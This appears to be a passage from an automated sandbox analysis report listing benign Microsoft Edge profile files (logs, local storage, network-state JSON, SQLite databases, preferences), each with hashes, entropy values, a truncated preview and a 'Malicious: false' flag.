Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	401
Entropy (8bit):	5.283122804852191
Encrypted:	false
SSDEEP:	12:7cL+vdZYeb8rcHEZrELFUtXW/ILV5wZYeb8rcHEZrEZSJ:7dbYeb8nZrExgX9gYeb8nZrEZe
MD5:	3C416A8882ED63E366029CBA50E3EBE9
SHA1:	0F761A5A741555E85FEA398E5514A4BA4D2AD31F
SHA-256:	3DEBBC66D8A3EA52D829324EF34266DE9114F65D5CF8675CDBB7C2C9BDEE19F9
SHA-512:	C624F0DB22D9E229061C0F297AF52A659BAB40A797F54923E6B0079E420ECC85D2FA1D88E38CD6AF78B8A4964AF139F28DE2978706C76337A56F21037D5DA3D2
Malicious:	false
Preview:	2025/01/09-08:56:13.017 b5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:56:13.017 b5c Recovering log #3.2025/01/09-08:56:13.017 b5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	401
Entropy (8bit):	5.283122804852191
Encrypted:	false
SSDEEP:	12:7cL+vdZYeb8rcHEZrELFUtXW/ILV5wZYeb8rcHEZrEZSJ:7dbYeb8nZrExgX9gYeb8nZrEZe
MD5:	3C416A8882ED63E366029CBA50E3EBE9
SHA1:	0F761A5A741555E85FEA398E5514A4BA4D2AD31F
SHA-256:	3DEBBC66D8A3EA52D829324EF34266DE9114F65D5CF8675CDBB7C2C9BDEE19F9
SHA-512:	C624F0DB22D9E229061C0F297AF52A659BAB40A797F54923E6B0079E420ECC85D2FA1D88E38CD6AF78B8A4964AF139F28DE2978706C76337A56F21037D5DA3D2
Malicious:	false
Preview:	2025/01/09-08:56:13.017 b5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:56:13.017 b5c Recovering log #3.2025/01/09-08:56:13.017 b5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1659
Entropy (8bit):	5.647121928401677
Encrypted:	false
SSDEEP:	48:lZm7TWwqDsXZiaRV03Sx4AyTntFWv7AHHk2GJ348ylsT:lqWwaWDBWjDdP8osT
MD5:	21CE3F97E28EB9732D0CBB1BC31A922E
SHA1:	66C86892B0577A8AE3BBBED1D90B7D505076236B
SHA-256:	BFE7EC5C14712CECD74909EA8B00086D4137D92D763A3359E697BBB745EEC358
SHA-512:	39960A584996CB5654AE7EFEC6F83C1DFD4B1F899BECBC2B4B1A00F73711B0D9181D44BFCA1042049E02938EEE79CB51973F5AA96EF308653973E3EF7FE9C26E
Malicious:	false
Preview:	b.L..................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1736430974738.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736430975935.._https://ntp.msn.com..MUID!.3D203036AC4A619B0A382559AD536038.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736430974840,"schedule":[9,-1,32,10,-1,-1,-1],"scheduleFixed":[9,-1,32,10,-1,-1,-1],"simpleSchedule":[28,50,13,34,48,17,42]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736430974705.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Thu Jan 09 2025 08:56:14 GMT-0500 (Eastern Standard

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.196040463641107
Encrypted:	false
SSDEEP:	6:iOrvkdL+q2PFi23oH+Tcwt8a2jMGIFUtJvkn11ZmwPvk4JdLVkwOFi23oH+Tcwtw:7qL+vdZYeb8EFUt6/FLV5wZYeb8bJ
MD5:	5C1639CA0FB60442CE216565338DD1D5
SHA1:	09A46C0ABAE80301DA1F5CDDEC550202977EC35B
SHA-256:	92132B7022EEFE10F8223BB4208C4211399CCDC8357D6B63F3E332956CD159CA
SHA-512:	CC8E45B1233570ED782E866B5FDCFDCD0FCC87BFF3C3374EA7086DCB95F821684AB8DBCF59B4B462D8F9DDBBFEFD4F2650A0E2F6596E32194BF890CD164B4AD3
Malicious:	false
Preview:	2025/01/09-08:56:06.624 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:56:06.626 1c7c Recovering log #3.2025/01/09-08:56:06.629 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.196040463641107
Encrypted:	false
SSDEEP:	6:iOrvkdL+q2PFi23oH+Tcwt8a2jMGIFUtJvkn11ZmwPvk4JdLVkwOFi23oH+Tcwtw:7qL+vdZYeb8EFUt6/FLV5wZYeb8bJ
MD5:	5C1639CA0FB60442CE216565338DD1D5
SHA1:	09A46C0ABAE80301DA1F5CDDEC550202977EC35B
SHA-256:	92132B7022EEFE10F8223BB4208C4211399CCDC8357D6B63F3E332956CD159CA
SHA-512:	CC8E45B1233570ED782E866B5FDCFDCD0FCC87BFF3C3374EA7086DCB95F821684AB8DBCF59B4B462D8F9DDBBFEFD4F2650A0E2F6596E32194BF890CD164B4AD3
Malicious:	false
Preview:	2025/01/09-08:56:06.624 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:56:06.626 1c7c Recovering log #3.2025/01/09-08:56:06.629 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3b170b87-813f-45f5-ac1e-de263c762f6b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1453
Entropy (8bit):	5.300008301469919
Encrypted:	false
SSDEEP:	24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7nby:YcCpWsquCvsBfcKspgCgakhYhbg
MD5:	6D62BD7FBF058BA973FD160EC7EECAF8
SHA1:	7C6A2F7459CE570BC83DAF81A9C0BAA8EC60FA2D
SHA-256:	8D24CACEFBD3B56B7794CE5646E20848895A11BB6A8CC3C04E3880B0FEBE88B2
SHA-512:	B510814BAC84C303D6CDD4238AF2A1026A0FF7FD3EA0BF7D05F00348D8A8AE75AA02F55D5C185309A05295C0D83E6C10B788CFB68BD8DA623CBFA2885273468E
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\44167298-6a84-4322-8be8-c29a7fea1331.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1747
Entropy (8bit):	5.308229176723951
Encrypted:	false
SSDEEP:	48:YcCpfgCzs2tsNfcKsR6leeIkBRsR2CgHuYhbg:F2f5y7keIkBnTDhs
MD5:	B87853A802C245C8919B0B7B105F98F3
SHA1:	DBC9506F887875CCC6BC5300C7B04C26DC09BC85
SHA-256:	D5F473651BD41B1451AC47789937385E5C70221547331C262CE106B6BF5AF857
SHA-512:	482158FC9F8470411FE07440E59D91762DFF68A429D7E22A8769541DB0B639244BECEE511272BA7B49D894FF1076DA266775B0719BF0F3C94519478155324B12
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496568836049","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496573943742","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380998175165307","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\82d0eb47-bf75-498e-a0e4-0b88f5ad6615.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7761035829917433
Encrypted:	false
SSDEEP:	384:VUHokoQZ3cS56liDY8NwF2k2yNXI0LhJVb:SokoQZ3ciwM/F0LhJ9
MD5:	C28EBA2DA8515250FE1B7D4FB817AC7D
SHA1:	60C8580DC02639D7C0A3982C7BDEA72C131206CD
SHA-256:	95EB3140989ED720B1826A4C2B6FAAC82BDA8326454617C164041F2F5EB7521A
SHA-512:	AB173C40F8C597A7EBE7439E263E017FF5D979D4BD085010BD74BAB378070ED719538B625C1FCA9AFA59CC47FA5381F2A234C3AF441D9F0F8459DCCAC61615B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1453
Entropy (8bit):	5.300008301469919
Encrypted:	false
SSDEEP:	24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7nby:YcCpWsquCvsBfcKspgCgakhYhbg
MD5:	6D62BD7FBF058BA973FD160EC7EECAF8
SHA1:	7C6A2F7459CE570BC83DAF81A9C0BAA8EC60FA2D
SHA-256:	8D24CACEFBD3B56B7794CE5646E20848895A11BB6A8CC3C04E3880B0FEBE88B2
SHA-512:	B510814BAC84C303D6CDD4238AF2A1026A0FF7FD3EA0BF7D05F00348D8A8AE75AA02F55D5C185309A05295C0D83E6C10B788CFB68BD8DA623CBFA2885273468E
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF467ee.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1453
Entropy (8bit):	5.300008301469919
Encrypted:	false
SSDEEP:	24:YcCp/WRdsuZVMdmwC5mWRdsfZFRudFGRRds3ZFGJ/I3w6C1E6maPsQYhbd7nby:YcCpWsquCvsBfcKspgCgakhYhbg
MD5:	6D62BD7FBF058BA973FD160EC7EECAF8
SHA1:	7C6A2F7459CE570BC83DAF81A9C0BAA8EC60FA2D
SHA-256:	8D24CACEFBD3B56B7794CE5646E20848895A11BB6A8CC3C04E3880B0FEBE88B2
SHA-512:	B510814BAC84C303D6CDD4238AF2A1026A0FF7FD3EA0BF7D05F00348D8A8AE75AA02F55D5C185309A05295C0D83E6C10B788CFB68BD8DA623CBFA2885273468E
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564963919255","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564964617465","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343564974643939","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.2794126374840051
Encrypted:	false
SSDEEP:	48:T2fIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBUV:ifIEumQv8m1ccnvS6Oeii7n1a
MD5:	7852FA4F1E877D472955B0369CA3C76B
SHA1:	575AD976291C2F516A788811501448769EE5106C
SHA-256:	6D7B3E8EEC38AB5C60EA49BD0DB5A8B866A579721DC4D673A94F6E6B199FC2A7
SHA-512:	66E172505969CF940EF430D80EF8A084C4B3B9C775A33A1DE845156C37F156F982CEF9CFFED844D4CB0BD49426A998D9A082A83709DC67D813497D986747C821
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF357a6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3642a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF373d9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a2c6d094-cea2-4170-a036-28e74a8b273e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c953bc48-2854-4c13-8bde-26a1b85dbb9d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\cd980b3a-dee9-4f8b-9d0d-32e3ce8dad47.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f7c911b6-e884-409c-9cb2-bc95037dc52a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10944
Entropy (8bit):	5.1595815897693855
Encrypted:	false
SSDEEP:	192:st6kdplsfb7IlN6xykdjeDPYKwFOO8obV+FTZQwne1y93HPXYJ:st6Qlsfb7i4LxbG9Qwz90
MD5:	A69B58634BEDFAC8D1946076B296A264
SHA1:	D5A108ED4E8343FA358A4B35255699C8ECC8A2B5
SHA-256:	47B9AFB0A5E04547DADCA34DF322992C7FF17042C7A25A4D359859AD3652F75F
SHA-512:	A2E0754C40D41454F3ECDDE2AF0E43629ED6D184DFC0187B58ED55D978CFC238403F251CE08F04262F9DB82A197710D449D3CB78252F6ACA92475D13FF03F5B2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF38bd6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10944
Entropy (8bit):	5.1595815897693855
Encrypted:	false
SSDEEP:	192:st6kdplsfb7IlN6xykdjeDPYKwFOO8obV+FTZQwne1y93HPXYJ:st6Qlsfb7i4LxbG9Qwz90
MD5:	A69B58634BEDFAC8D1946076B296A264
SHA1:	D5A108ED4E8343FA358A4B35255699C8ECC8A2B5
SHA-256:	47B9AFB0A5E04547DADCA34DF322992C7FF17042C7A25A4D359859AD3652F75F
SHA-512:	A2E0754C40D41454F3ECDDE2AF0E43629ED6D184DFC0187B58ED55D978CFC238403F251CE08F04262F9DB82A197710D449D3CB78252F6ACA92475D13FF03F5B2
Malicious:	false
